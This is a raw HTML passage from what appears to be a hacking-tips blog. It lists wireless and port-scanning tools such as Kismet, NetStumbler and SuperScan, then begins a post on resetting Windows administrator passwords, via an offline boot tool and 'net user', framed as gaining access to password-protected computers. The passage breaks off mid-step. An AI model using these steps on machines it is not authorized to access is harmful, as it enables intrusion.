initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">5. <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: italic; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Kismet </em></strong><br />
Kismet is an 802.11 layer2 wireless network detector, <img alt="" class="alignright" height="60" src="http://www.wlan.org.uk/kismet_logo.JPG" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; float: right; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 10px; margin-left: 14px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;" width="147" />sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic. A good wireless tool as long as your card supports rfmon</div><h2 style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; color: #111111; font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 2em; font-style: inherit; font-weight: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><a href="http://www.kismetwireless.net/download.shtml" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: black; font-family: inherit; font-size: 24px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Download Kismet</a></h2><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><br />
</div><ins style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: inline-table; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><ins id="aswift_3_anchor" style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: block; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><iframe allowtransparency="true" frameborder="0" height="60" hspace="0" id="aswift_3" marginheight="0" marginwidth="0" name="aswift_3" scrolling="no" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; left: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: absolute; top: 0px; vertical-align: baseline;" vspace="0" width="468"></iframe></ins></ins><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">6. <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: italic; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">NetStumbler</em></strong><br />
Yes a decent wireless tool for Windows! Sadly not<img alt="" class="alignright" height="60" src="http://www.ittc.ku.edu/wlan/images/netstumbler_logo.jpg" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; float: right; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 10px; margin-left: 14px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;" width="157" /> as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving. NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:</div><ol style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; list-style-type: decimal; margin-bottom: 1.5em; margin-left: 1.5em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Verify that your network is set up the way you intended.</li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Find locations with poor coverage in your WLAN.</li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Detect other networks that may be causing interference on your network.</li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Detect unauthorized rogue access points in your workplace.</li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Help aim directional antennas for long-haul WLAN links.</li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Use it recreationally for WarDriving.</li>
</ol><h2 style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; color: #111111; font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 2em; font-style: inherit; font-weight: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><a href="http://www.stumbler.net/" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: black; font-family: inherit; font-size: 24px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Download Netstumbler</a></h2><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><br />
</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">7. <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: italic; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">SuperScan</em></strong><br />
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Windows</strong> port scanning tool, SuperScan.If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">Alternatively,you can try <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Angry IP Scanner</strong> which is a pretty good replacement for it.</div><h2 style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; color: #111111; font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 2em; font-style: inherit; font-weight: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><a href="http://www.foundstone.com/us/resources/freetools/superscan4.zip" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: black; font-family: inherit; font-size: 24px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Download SuperScan</a></h2></div></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-88808703916380496142011-07-29T08:57:00.003-07:002011-07-29T08:57:36.322-07:00Hack the Administrator Password in Windows [modified]<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 12px; line-height: 18px;"><span class="Apple-style-span" style="color: yellow;"></span></span><br />
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">All of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.</span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.5em; margin-left: 1.5em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: italic; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">You do not need to know the old password to set a new one</strong></em></span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: italic; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Will detect and offer to unlock locked or disabled out user accounts!</strong></em></span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: italic; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.</strong></em></span></li>
</ul><h3 style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 1.5em; font-style: inherit; font-weight: inherit; line-height: 2; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">What it does ?</span></h3><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">Most Windows operating systems stores the login passwords and other encrypted passwords in a file called <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sam </strong>(Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">The download link for both CD and floppy drives along with the complete instructions is given below</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;"><a href="http://pogostick.net/~pnh/ntpasswd/bootdisk.html" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Offline NT Password & Reg Editor Download</a></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.</span></div><span class="Apple-style-span" style="color: yellow;"><ins style="border-bottom-style: none; border-color: initial; border-color: initial; border-left-style: none; border-right-style: none; border-style: initial; border-top-style: none; border-width: initial; display: inline-table; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><ins id="aswift_3_anchor" style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: block; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><iframe allowtransparency="true" frameborder="0" height="60" hspace="0" id="aswift_3" marginheight="0" marginwidth="0" name="aswift_3" scrolling="no" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; left: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: absolute; top: 0px; vertical-align: baseline;" vspace="0" width="468"></iframe></ins></ins><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.5em; margin-left: 1.5em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><h3 style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 1.5em; font-style: inherit; font-weight: inherit; line-height: 2; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Another simple way to reset non-administrator account passwords</h3></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">1. Open the command prompt (Start->Run->type <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">cmd</strong>->Enter)</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">2. Now type <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">net user</strong> and hit Enter</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">John</strong>, then do as follows</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">4. Type <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: 